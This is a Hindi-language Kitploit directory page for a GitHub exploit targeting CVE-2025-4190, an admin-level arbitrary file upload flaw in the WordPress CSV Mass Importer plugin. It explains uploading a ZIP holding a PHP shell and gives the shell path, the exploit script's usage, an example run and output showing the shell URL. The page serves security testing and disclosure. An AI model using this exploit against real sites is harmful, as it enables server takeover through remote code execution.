Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ मनमानी फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-4190
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 मनमाना फ़ाइल अपलोड

WordPress Plugin
CVE
Status
Author


📌 विवरण

वर्डप्रेस के लिए CSV Mass Importer प्लगइन (≤ 1.2) में Admin+ मनमाना फ़ाइल अपलोड कमजोरी है।
अपलोड की गई फ़ाइलों के अनुचित सत्यापन के कारण, उच्च‑विशेषाधिकार वाले उपयोगकर्ता (जैसे एडमिन) सर्वर पर मनमानी फ़ाइलें अपलोड कर सकते हैं, भले ही इसे प्रतिबंधित किया जाना चाहिए — उदाहरण के लिए मल्टीसाइट सेटअप में।

यह कमजोरी एक हमलावर को PHP शेल या दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है, जिससे सर्वर पर रिमोट कोड निष्पादन (RCE) होता है।

Nxploited (Khaled Alenazi) द्वारा खोजा गया।


🔥 विवरण

  • प्लगइन नाम: CSV Mass Importer
  • प्रभावित संस्करण: ≤ 1.2
  • कमजोरी प्रकार: Admin+ मनमाना फ़ाइल अपलोड
  • CVE: CVE-2025-4190
  • WPVDB ID: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • मूल शोधकर्ता: Khaled Alenazi (Nxploited)
  • प्रस्तुतकर्ता वेबसाइट: https://github.com/Nxploited
  • सत्यापित: ✅

💻 प्रूफ ऑफ कॉन्सेप्ट (PoC)

CSV आयात सुविधा का उपयोग करते समय प्लगइन अपलोड की गई फ़ाइलों की सही जाँच करने में विफल रहता है।
PHP शेल वाली एक तैयार की गई ZIP फ़ाइल को अपलोड किया जा सकता है और सार्वजनिक रूप से सुलभ निर्देशिका में निकाला जा सकता है।

शेल पथ उदाहरण:

<target-url>/wp-content/uploads/cmi-data/nxploited.php

🚀 उपयोग

स्क्रिप्ट

इस रिपॉजिटरी में एक तैयार पायथन एक्सप्लॉइट स्क्रिप्ट है: 4190.py

सहायता मेनू

python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password

उदाहरण रन

python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin

अपेक्षित आउटपुट

[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)

🕰 समयरेखा

  • सार्वजनिक रूप से प्रकाशित: 2025-04-26 (लगभग 11 दिन पहले)
  • डेटाबेस में जोड़ा गया: 2025-05-07 (लगभग 1 घंटा पहले)
  • अंतिम अद्यतन: 2025-05-07 (लगभग 1 घंटा पहले)

🛡 संदर्भ

  • CVE-2025-4190 WPScan पर

⚠ अस्वीकरण

यह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर करें जिनका परीक्षण करने के लिए आप अधिकृत हैं।


Khaled Alenazi (Nxploited) द्वारा खोजा और विकसित किया गया 🌟

टूल डाउनलोड करें